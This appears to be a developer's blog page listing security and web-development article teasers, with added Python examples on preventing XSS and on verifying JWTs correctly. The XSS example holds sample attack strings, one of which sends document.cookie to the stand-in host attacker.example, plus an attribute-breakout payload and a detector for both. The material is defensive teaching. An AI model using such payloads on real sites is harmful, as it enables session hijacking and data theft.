
If you’re a developer, chances are you’ve heard of cross-site scripting. Cross-site scripting, commonly known as XSS, appears in the OWASP Top 10 list of the most common web application security risks. It remains a major problem in many web applications: an attacker who can get their script to run in a victim’s browser can steal session tokens, read whatever data the victim is allowed to see, and perform actions as that user. As a developer, it’s important to know what XSS is and to be aware of it, but it’s even more important to know how to prevent it. Cybersecurity isn’t just for security specialists; it’s for everyone.

Today, I’m going to give you an introduction to XSS. …
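
To make the prevention point concrete, here is an added example (not code from the linked article): a vulnerable rendering function next to its hardened form, in Python, using the standard library’s html.escape. The sample attacker strings and the looks_like_live_markup checker are constructed for this demo only.

```python
import html

# Constructed sample inputs for this example: what an attacker might type into a
# "display name" field. They are made-up test data, not payloads from a real site.
ATTACKER_NAME = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_BREAKOUT = '" onmouseover="alert(document.domain)'


def greet_unsafe(name: str) -> str:
    """Vulnerable: untrusted input is concatenated straight into the page.
    Whatever the user supplied is parsed by the browser as markup."""
    return "<p>Hello, " + name + "!</p>"


def greet_safe(name: str) -> str:
    """Hardened: the value is escaped for the HTML text context before insertion,
    so the browser renders it as text instead of executing it."""
    return "<p>Hello, " + html.escape(name, quote=True) + "!</p>"


def title_attr_unsafe(value: str) -> str:
    """Vulnerable: the same bug in an attribute context. A stray double quote
    closes the attribute and lets the attacker append an event handler."""
    return '<a href="/profile" title="' + value + '">profile</a>'


def title_attr_safe(value: str) -> str:
    """Hardened: quote=True also encodes " and ' so the attribute cannot be
    terminated early."""
    return '<a href="/profile" title="' + html.escape(value, quote=True) + '">profile</a>'


def looks_like_live_markup(rendered: str) -> bool:
    """Crude detector used only to illustrate the difference: did an unescaped
    <script> tag or a bare onmouseover attribute survive into the output?"""
    lowered = rendered.lower()
    return "<script" in lowered or '" onmouseover="' in lowered
```

Escaping is context-specific: html.escape is correct for element text and quoted attributes, but not for values dropped into JavaScript strings, URLs, or CSS, which need their own encoders. In a real application you would let a template engine with auto-escaping (Jinja2, for example) do this for every value by default, and add a Content-Security-Policy header as defence in depth.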



How are you securing your web applications? Are you using session cookies? Third-party authentication? SAML? Today I’m going to introduce you to a neat standard called JSON Web Tokens, or JWT for short. If you’ve worked on web applications, there’s a good chance you’ve at least heard of them, but today I’m going to try to de-mystify them for you.

If you’re interested in getting into all the nitty-gritty details, you can read RFC 7519, but that’s not the goal of this article. Instead, I’m going to:

  1. Give you a high-level overview of what JWT is
  2. Go a little…
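
Before the high-level overview, here is an added example (not code from the linked article) that shows what a JWT actually is on the wire: three base64url sections, header.payload.signature, with an HMAC-SHA256 over the first two. The verify side is where the security lives, so it also shows the checks a consumer must do: pin the algorithm instead of trusting the header’s alg, compare the MAC in constant time, and honour exp. DEMO_KEY and the claims are made up for this demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


def _b64url_encode(raw: bytes) -> str:
    # JWT uses base64url without "=" padding (RFC 7515 section 2).
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_jwt(claims: dict, key: bytes) -> str:
    """Produce header.payload.signature for an HS256 token."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode("utf-8"))
        + "."
        + _b64url_encode(json.dumps(claims, separators=(",", ":")).encode("utf-8"))
    )
    signature = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(signature)


def verify_jwt(token: str, key: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if the token is valid, otherwise None.

    Order of checks: the structure parses; the header's alg is exactly the one
    we issue (so "alg":"none" and RS256-vs-HS256 key-confusion tokens are
    rejected before any crypto runs); the HMAC matches, compared in constant
    time; the payload parses; and the token has not expired."""
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(signature_b64)
        signing_input = (header_b64 + "." + payload_b64).encode("ascii")
    except ValueError:  # wrong part count, bad base64, bad JSON, non-ASCII
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    try:
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:
        return None
    if not isinstance(claims, dict):
        return None
    now = time.time() if now is None else now
    exp = claims.get("exp")
    if exp is not None and (not isinstance(exp, (int, float)) or now >= exp):
        return None
    return claims


# Constructed key for this demo only. A real HS256 key is at least 32 random
# bytes loaded from a secret store, never a literal in source.
DEMO_KEY = b"example-only-do-not-use-this-key-0123456789"
```

In production you would use a maintained library such as PyJWT and pass an explicit algorithms=["HS256"] allow-list; the point of the hand-rolled version is to make visible what that library has to get right, because most real JWT bugs are consumers skipping one of these checks rather than broken crypto.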



Are you hashing your users’ passwords? More importantly, are you doing it correctly? There’s a lot of information out there on password hashing, and there are certainly more than a few different hash algorithms available for you to use, not all of which are suitable for passwords: general-purpose hashes like MD5 and SHA-256 are designed to be fast, which is exactly the property a password hash must not have.

As a full-stack engineer, I’ve spent plenty of time building password-based authentication mechanisms. As an ethical hacker, I’ve spent plenty of time trying to break those mechanisms and crack password hashes.

In this article, I’m going to provide a brief overview of secure password hashing and storage, and then I’m going to show you how to securely hash your passwords for…



If you’ve ever been unfortunate enough to have had to work with botocore, Amazon Web Services’ Python API, you know that it’s awful. There are dozens of ways to accomplish any given task, and the differences between each are unclear at best. I recently found myself working with botocore while trying to build some S3 functionality into codelighthouse, and I got really frustrated with it, really quickly.

AWS S3 (Simple Storage Service) is not complicated — it’s object storage. You can GET, PUT, DELETE and COPY objects, with a few other functionalities. Simple, right? …


CodeLighthouse launches support for Node.js and Express.js


Node.js is here, and it’s here to stay — both at CodeLighthouse and in the developer world at large. Node.js has absolutely exploded in terms of popularity since 2009. In general, JavaScript remains extremely popular — the 2020 StackOverflow developer survey ranks JavaScript as the #1 most commonly used language, beating contenders like Python, Java, and PHP:

Kyle Mistele

Co-Founder and CTO @ CodeLighthouse.io, OSCP
